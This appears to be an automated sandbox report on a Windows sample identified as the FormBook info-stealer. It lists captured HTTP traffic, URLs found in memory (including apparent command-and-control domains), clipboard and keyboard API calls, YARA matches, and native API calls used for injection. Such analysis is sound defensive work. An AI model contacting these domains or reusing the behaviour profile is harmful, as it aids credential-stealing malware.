          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 11:04:36 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 11:04:39 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 11:04:42 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 11:04:44 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 11:04:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closex-sorting-hat-podid: 156x-sorting-hat-shopid: 68129128605vary: Accept-Encoding,Acceptx-frame-options: DENYx-shopid: 68129128605x-shardid: 156content-language: en-INx-shopify-nginx-no-cookies: 0set-cookie: _tracking_consent=%7B%22con%22%3A%7B%22CMP%22%3A%7B%22a%22%3A%22%22%2C%22m%22%3A%22%22%2C%22p%22%3A%22%22%2C%22s%22%3A%22%22%7D%7D%2C%22v%22%3A%222.1%22%2C%22region%22%3A%22USNY%22%2C%22reg%22%3A%22%22%7D; domain=zingara.life; path=/; expires=Thu, 10 Oct 2024 11:04:50 GMT; SameSite=Laxset-cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22sale_of_data_region%22%3Afalse%7D; domain=zingara.life; path=/; expires=Thu, 10 Oct 2024 11:04:50 GMT; SameSite=Laxset-cookie: localization=IN; path=/; expires=Thu, 09 Oct 2025 11:04:50 GMT; SameSite=Laxset-cookie: _shopify_y=1df4171f-fe86-4c92-af19-6810bd200ea4; Expires=Thu, 09-Oct-25 11:04:50 GMT; Domain=zingara.life; Path=/; SameSite=Laxset-cookie: _shopify_s=7853b78d-753d-4f3f-a5db-c02e04aff0ef; Expires=Wed, 09-Oct-24 11:34:50 GMT; Domain=zingara.life; Path=/; SameSite=Data Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 11:04:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closex-sorting-hat-podid: 156x-sorting-hat-shopid: 68129128605vary: Accept-Encoding,Acceptx-frame-options: DENYx-shopid: 68129128605x-shardid: 156content-language: en-INx-shopify-nginx-no-cookies: 0set-cookie: _tracking_consent=%7B%22con%22%3A%7B%22CMP%22%3A%7B%22a%22%3A%22%22%2C%22m%22%3A%22%22%2C%22p%22%3A%22%22%2C%22s%22%3A%22%22%7D%7D%2C%22v%22%3A%222.1%22%2C%22region%22%3A%22USNY%22%2C%22reg%22%3A%22%22%7D; domain=zingara.life; path=/; expires=Thu, 10 Oct 2024 11:04:52 GMT; SameSite=Laxset-cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22sale_of_data_region%22%3Afalse%7D; domain=zingara.life; path=/; expires=Thu, 10 Oct 2024 11:04:52 GMT; SameSite=Laxset-cookie: localization=IN; path=/; expires=Thu, 09 Oct 2025 11:04:53 GMT; SameSite=Laxset-cookie: _shopify_y=4c54a4ea-beee-4680-9a75-6cf216a3001a; Expires=Thu, 09-Oct-25 11:04:53 GMT; Domain=zingara.life; Path=/; SameSite=Laxset-cookie: _shopify_s=0d286487-46fd-43a6-a5f2-12cc4ec5e7eb; Expires=Wed, 09-Oct-24 11:34:53 GMT; Domain=zingara.life; Path=/; SameSite=Data Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 11:04:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closex-sorting-hat-podid: 156x-sorting-hat-shopid: 68129128605vary: Accept-Encoding,Acceptx-frame-options: DENYx-shopid: 68129128605x-shardid: 156content-language: en-INx-shopify-nginx-no-cookies: 0set-cookie: _tracking_consent=%7B%22con%22%3A%7B%22CMP%22%3A%7B%22a%22%3A%22%22%2C%22m%22%3A%22%22%2C%22p%22%3A%22%22%2C%22s%22%3A%22%22%7D%7D%2C%22v%22%3A%222.1%22%2C%22region%22%3A%22USNY%22%2C%22reg%22%3A%22%22%7D; domain=zingara.life; path=/; expires=Thu, 10 Oct 2024 11:04:55 GMT; SameSite=Laxset-cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22sale_of_data_region%22%3Afalse%7D; domain=zingara.life; path=/; expires=Thu, 10 Oct 2024 11:04:55 GMT; SameSite=Laxset-cookie: localization=IN; path=/; expires=Thu, 09 Oct 2025 11:04:55 GMT; SameSite=Laxset-cookie: _shopify_y=101d33f6-59dc-43c5-a1bb-c6ef86b34ba2; Expires=Thu, 09-Oct-25 11:04:55 GMT; Domain=zingara.life; Path=/; SameSite=Laxset-cookie: _shopify_s=9dea918b-c5fe-4834-b024-5be6d8b36844; Expires=Wed, 09-Oct-24 11:34:55 GMT; Domain=zingara.life; Path=/; SameSite=Data Raw: Data Ascii:
          Source: firefox.exe, 00000008.00000003.705628365611.00000204FE498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/r/r1.crl0
          Source: firefox.exe, 00000008.00000003.705628365611.00000204FE498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
          Source: firefox.exe, 00000008.00000003.705628365611.00000204FE498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
          Source: firefox.exe, 00000008.00000003.705628365611.00000204FE498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
          Source: firefox.exe, 00000008.00000003.705628365611.00000204FE498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
          Source: firefox.exe, 00000008.00000003.705628365611.00000204FE498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
          Source: firefox.exe, 00000008.00000003.705628365611.00000204FE498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
          Source: firefox.exe, 00000008.00000003.705628365611.00000204FE498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
          Source: firefox.exe, 00000008.00000003.705628365611.00000204FE498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i.pki.goog/r1.crt0
          Source: choice.exe, 00000005.00000002.708581961090.0000000006C9C000.00000004.10000000.00040000.00000000.sdmp, SjhnWvlTMw.exe, 00000006.00000002.708580526921.000000000467C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://kx507945.shop
          Source: firefox.exe, 00000008.00000003.705628365611.00000204FE498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: firefox.exe, 00000008.00000003.705628365611.00000204FE498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
          Source: SjhnWvlTMw.exe, 00000006.00000002.708576743698.0000000000F63000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.agilizeimob.app
          Source: SjhnWvlTMw.exe, 00000006.00000002.708576743698.0000000000F63000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.agilizeimob.app/51t8/
          Source: choice.exe, 00000005.00000002.708581961090.0000000005CE8000.00000004.10000000.00040000.00000000.sdmp, SjhnWvlTMw.exe, 00000006.00000002.708580526921.00000000036C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.languyenthuyduyen.xyz/cgi-sys/suspendedpage.cgi?9X=EvKH2xeP-DpP307P&nhl=T4KZNGow8hyHZ/2Vd
          Source: firefox.exe, 00000008.00000003.705628365611.00000204FE498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
          Source: firefox.exe, 00000008.00000003.705628365611.00000204FE498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
          Source: choice.exe, 00000005.00000002.708584614701.00000000083CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: choice.exe, 00000005.00000002.708584614701.00000000083CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: choice.exe, 00000005.00000002.708584614701.00000000083CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: choice.exe, 00000005.00000002.708584614701.00000000083CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: choice.exe, 00000005.00000002.708584614701.00000000083CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: choice.exe, 00000005.00000002.708584614701.00000000083CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
          Source: choice.exe, 00000005.00000003.705564214205.00000000083AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd
          Source: choice.exe, 00000005.00000002.708575105258.000000000319F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
          Source: choice.exe, 00000005.00000002.708575105258.0000000003170000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdlcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=16
          Source: choice.exe, 00000005.00000002.708584614701.00000000083CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
          Source: choice.exe, 00000005.00000002.708584614701.00000000083CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: choice.exe, 00000005.00000002.708581961090.0000000005E7A000.00000004.10000000.00040000.00000000.sdmp, SjhnWvlTMw.exe, 00000006.00000002.708580526921.000000000385A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.bayarcepat19.click/x7ji/?nhl=VbX4XoU1axPwTLIf98pUGPIzQL60g31CACrHzmj3o8Yh1t/lPrcBk6uAM4j
          Source: choice.exe, 00000005.00000002.708584614701.00000000083CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: choice.exe, 00000005.00000002.708581961090.00000000064C2000.00000004.10000000.00040000.00000000.sdmp, SjhnWvlTMw.exe, 00000006.00000002.708580526921.0000000003EA2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
          Source: choice.exe, 00000005.00000002.708584614701.00000000083CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/favicon.ico
          Source: choice.exe, 00000005.00000002.708581961090.0000000006978000.00000004.10000000.00040000.00000000.sdmp, SjhnWvlTMw.exe, 00000006.00000002.708580526921.0000000004358000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://zingara.life/c0mi?9X=EvKH2xeP-DpP307P&nhl=/qBPJVDnAuMkCGTP/HS85thBhnm7sJojL9dSRPkeMTtigtz0zs
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.708574335375.0000000003010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.705383176691.0000000006730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.708579283397.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.705376707747.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.708579534751.0000000004DE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.708578550328.0000000003FE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.708574335375.0000000003010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.705383176691.0000000006730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.708579283397.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.705376707747.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.708579534751.0000000004DE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.705378813444.0000000004D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.705378813444.0000000004390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.708578550328.00000000035E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C223 NtClose,2_2_0042C223
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036734E0 NtCreateMutant,LdrInitializeThunk,2_2_036734E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672B90 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03672B90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672A80 NtClose,LdrInitializeThunk,2_2_03672A80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672D10 NtQuerySystemInformation,LdrInitializeThunk,2_2_03672D10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03674260 NtSetContextThread,2_2_03674260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03674570 NtSuspendThread,2_2_03674570
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672B20 NtQueryInformationProcess,2_2_03672B20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672B00 NtQueryValueKey,2_2_03672B00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672B10 NtAllocateVirtualMemory,2_2_03672B10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672BE0 NtQueryVirtualMemory,2_2_03672BE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672BC0 NtQueryInformationToken,2_2_03672BC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672B80 NtCreateKey,2_2_03672B80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672A10 NtWriteFile,2_2_03672A10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672AC0 NtEnumerateValueKey,2_2_03672AC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672AA0 NtQueryInformationFile,2_2_03672AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036729F0 NtReadFile,2_2_036729F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036729D0 NtWaitForSingleObject,2_2_036729D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036738D0 NtGetContextThread,2_2_036738D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672F30 NtOpenDirectoryObject,2_2_03672F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672F00 NtCreateFile,2_2_03672F00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672FB0 NtSetValueKey,2_2_03672FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672E50 NtCreateSection,2_2_03672E50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672E00 NtQueueApcThread,2_2_03672E00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672EC0 NtQuerySection,2_2_03672EC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672ED0 NtResumeThread,2_2_03672ED0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672EB0 NtProtectVirtualMemory,2_2_03672EB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672E80 NtCreateProcessEx,2_2_03672E80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672D50 NtWriteVirtualMemory,2_2_03672D50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672DC0 NtAdjustPrivilegesToken,2_2_03672DC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672DA0 NtReadVirtualMemory,2_2_03672DA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672C50 NtUnmapViewOfSection,2_2_03672C50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672C20 NtSetInformationFile,2_2_03672C20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672C30 NtMapViewOfSection,2_2_03672C30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03673C30 NtOpenProcessToken,2_2_03673C30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672C10 NtOpenProcess,2_2_03672C10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672CF0 NtDelayExecution,2_2_03672CF0
